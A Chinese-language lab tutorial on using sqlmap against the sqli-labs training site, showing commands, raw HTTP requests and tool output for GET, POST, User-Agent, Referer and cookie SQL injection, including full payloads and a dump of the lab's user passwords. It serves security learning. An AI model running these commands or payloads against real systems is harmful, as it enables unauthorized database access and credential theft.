前言
在 從sqli-labs學習SQL注入(Less1-Less6) 的系列中,展示了手動注入,這篇文章將使用sqlmap注入
安裝
安裝python
我的windows 10 電腦已經裝過了(Python 3.8.6),這裡略過
下載sqlmap
$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
然後以下的操作都在 sqlmap-dev 資料夾下操作
sqli-labs
Less-1(基於GET的注入)
聯合查詢注入
檢查注入點
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
對於剩餘的測試,您想要包括所有針對 "MySQL" 擴展提供的級別(1)和風險(1)值的測試嗎? [Y/n] 輸入"Y"
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
...
GET參數'id'是弱點。你想要繼續測試其他的(如果有)?
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
發現id是聯合查詢注入(UNION query)的弱點
sqlmap identified the following injection point(s) with a total of 29 HTTP(s) requests:
---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7535' UNION ALL SELECT NULL,CONCAT(0x71766b6271,0x644d6a4547546f724e4f6a5943474779796379665674464b4a496f76655865696472594b54466848,0x7171627871),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
可以查出使用的是nginx和大概的MySQL版本(我的環境是MySQL 5.6)
--technique=TECH - SQL注入技術測試(默認B布爾、E報錯、U聯合查詢、S、T延時)
--dbms=DBMS - 強制後端的DBMS為此值
--random-agent - 使用隨機選定的HTTP User Agent Header
--flush-session - 刷新當前目標的會話文件
-v VERBOSE - 詳細級別:0-6(默認為1)。3:有效載荷注入。
列庫
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --dbs
...
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
列表
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 -D security --tables
Database: security [4 tables] +----------+ | emails | | referers | | uagents | | users | +----------+
列出表中字段
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 -D security -T users --columns
Database: security Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(3) | | password | varchar(20) | | username | varchar(20) | +----------+-------------+
dump資料
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 -D security -T users --dump
Database: security Table: users [8 entries] +----+------------+----------+ | id | password | username | +----+------------+----------+ | 1 | Dumb | Dumb | | 2 | I-kill-you | Angelina | | 3 | p@ssword | Dummy | | 4 | crappy | secure | | 5 | stupidity | stupid | | 6 | genious | superman | | 7 | mob!le | batman | | 8 | admin | admin | +----+------------+----------+
報錯注入
檢查注入點
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=E -v 3
...
sqlmap identified the following injection point(s) with a total of 6 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(7938,CONCAT(0x5c,0x7176786a71,(SELECT (ELT(7938=7938,1))),0x716b626b71)) AND 'uYoJ'='uYoJ
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---
發現id是報錯注入(error-based)的注入點
其他【列庫】、【列表】、【列字段】、【列值】和上面一樣
布爾盲注
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=B -v 3
...
sqlmap identified the following injection point(s) with a total of 19 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8085=8085 AND 'ZUiE'='ZUiE
Vector: AND [INFERENCE]
---
發現id是布爾盲注(boolean-based blind)的注入點
延時盲注
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=T -v 3
...
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2422 FROM (SELECT(SLEEP(5)))mFjj) AND 'mKHO'='mKHO
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
發現id是延時盲注(time-based blind)的注入點
延時盲注是實務上最強的注入方式(聯合查詢注入因不輸出查詢結果而不能使用、報錯注入因不輸出mysql_error()報錯而不能使用、布爾盲注因true和false都輸出同樣的結果而不能使用),但是在跑sqlmap時因為要sleep(),所以也是最花時間的
Less-11(基於POST的注入)
聯合查詢注入
檢查注入點(使用-r)
將 Burpsuite 截取的數據包內容保持為文本格式,如: sqli-labs-less-11.txt 然後放到 sqlmap-dev 資料夾(即sqlmap資料夾)下
POST /Less-11/ HTTP/1.1 Host: sqlilabs.bt Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://sqlilabs.bt Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://sqlilabs.bt/Less-11/ Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close uname=admin&passwd=2333&submit=Submit
然後直接使用 sqlmap 的 -r 參數來加載這個請求包:
$ python sqlmap.py -r sqli-labs-less-11.txt --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 28 HTTP(s) requests:
---
Parameter: uname (POST)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=admin%' UNION ALL SELECT NULL,CONCAT(0x7170706271,0x485079745259634d616679727a597655584e76474c6748725a586d616d6f7a62676f4d7448794247,0x7178706a71)#&passwd=2333&submit=Submit
Vector: UNION ALL SELECT NULL,[QUERY]#
---
發現uname是聯合查詢注入(UNION query)的注入點
-r REQUESTFILE - 從一個文件中載入HTTP請求
檢查注入點(使用--data)
$ python sqlmap.py -u "http://sqlilabs.bt/Less-11/" --data="uname=admin&passwd=2333&submit=Submit" -p "uname" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 28 HTTP(s) requests:
---
Parameter: uname (POST)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=admin%' UNION ALL SELECT CONCAT(0x717a7a6a71,0x68556c4f5158426e5279434e756f6d504869485945715773746444554a4653794358484c65656c6a,0x7178767a71),NULL#&passwd=2333&submit=Submit
Vector: UNION ALL SELECT [QUERY],NULL#
---
一樣可以發現uname是聯合查詢注入(UNION query)的注入點
--data=DATA - 通過POST發送的數據字符串
-p TESTPARAMETER - 可測試的參數
Less-18(基於User-Agent 請求頭的注入)
報錯注入
檢查注入點(使用-r)
將 Burpsuite 截取的數據包內容保持為文本格式,如: sqli-labs-less-18.txt 然後放到 sqlmap-dev 資料夾(即sqlmap資料夾)下,然後手動通過 * 來標記注入點: User-Agent: *
POST /Less-18/ HTTP/1.1 Host: sqlilabs.bt Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://sqlilabs.bt Content-Type: application/x-www-form-urlencoded User-Agent: * Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://sqlilabs.bt/Less-18/ Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close uname=admin&passwd=admin&submit=Submit
$ python sqlmap.py -r sqli-labs-less-18.txt --dbms=MySQL --random-agent --flush-session --technique=E -v 0 --level=3
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 720 HTTP(s) requests:
---
Parameter: User-Agent (User-Agent)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6'||(SELECT 0x6455485a FROM DUAL WHERE 7808=7808 AND GTID_SUBSET(CONCAT(0x717a627671,(SELECT (ELT(1983=1983,1))),0x7171626a71),1983))||'
---
發現User-Agent 是報錯注入(error-based)的注入點
--level=3 - 必須設置level 3以上才會發現 User-Agent 是注入點
-v 0 - 只顯示Python的回溯,錯誤和關鍵消息。
Less-19(基於Referer 請求頭的注入)
報錯注入
檢查注入點(使用-r)
將 Burpsuite 截取的數據包內容保持為文本格式,如: sqli-labs-less-19.txt 然後放到 sqlmap-dev 資料夾(即sqlmap資料夾)下,然後手動通過 * 來標記注入點: Referer: *
POST /Less-19/ HTTP/1.1 Host: sqlilabs.bt Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://sqlilabs.bt Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: * Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close uname=admin&passwd=admin&submit=Submit
$ python sqlmap.py -r sqli-labs-less-19.txt --dbms=MySQL --random-agent --flush-session --technique=E -v 0
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
(custom) HEADER parameter 'Referer #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 248 HTTP(s) requests:
---
Parameter: Referer #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: '||(SELECT 0x506b4f51 FROM DUAL WHERE 4198=4198 AND GTID_SUBSET(CONCAT(0x716b766a71,(SELECT (ELT(3749=3749,1))),0x716a7a6271),3749))||'
---
發現Referer 是報錯注入(error-based)的注入點
ps. 這題和Less-18不同,不需要設置 --level=3 就能找到注入點
Less-20(基於cookie的注入)
聯合查詢注入
檢查注入點(使用-r)
將 Burpsuite 截取的數據包內容保持為文本格式,如: sqli-labs-less-20.txt 然後放到 sqlmap-dev 資料夾(即sqlmap資料夾)下,然後手動通過 * 來標記注入點: Cookie: uname=admin*
GET /Less-20/index.php HTTP/1.1 Host: sqlilabs.bt Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://sqlilabs.bt/Less-20/ Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: uname=admin* Connection: close
$ python sqlmap.py -r sqli-labs-less-20.txt --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
...
do you want to URL encode cookie values (implementation specific)? [Y/n] n
...
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
...
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
...
sqlmap identified the following injection point(s) with a total of 23 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: uname=-1413' UNION ALL SELECT NULL,CONCAT(0x71716b7871,0x48586d697a467753574470624e646c6356764a5a43507a6e66677a6761547461435a6e56564a4866,0x7176627171),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
發現Cookie #1* ((custom) HEADER) ,即uname是聯合查詢注入(UNION query)的注入點
檢查注入點(使用--cookie)
$ python sqlmap.py -u "http://sqlilabs.bt/Less-20/" --cookie="uname=admin*" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
[13:56:32] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
...
do you want to URL encode cookie values (implementation specific)? [Y/n] n
...
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
...
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 23 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: uname=-4659' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707671,0x555467654f774b49554a536a7154764d485445544968526362524a49536f67486a6c417161667353,0x716b627171)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
發現Cookie #1* ((custom) HEADER) ,即uname是聯合查詢注入(UNION query)的注入點
參考資料
https://gitbook.cn/books/5ba8393639ea516190a9b8f8/index.html SQLMap 从入门到入狱详细指南
https://www.sqlsec.com/2020/05/sqlilabs.html SQLI labs 靶场精简学习记录
https://www.cnblogs.com/peterpan0707007/p/7620048.html 【总结】sqli-labs Less(1-35) 小结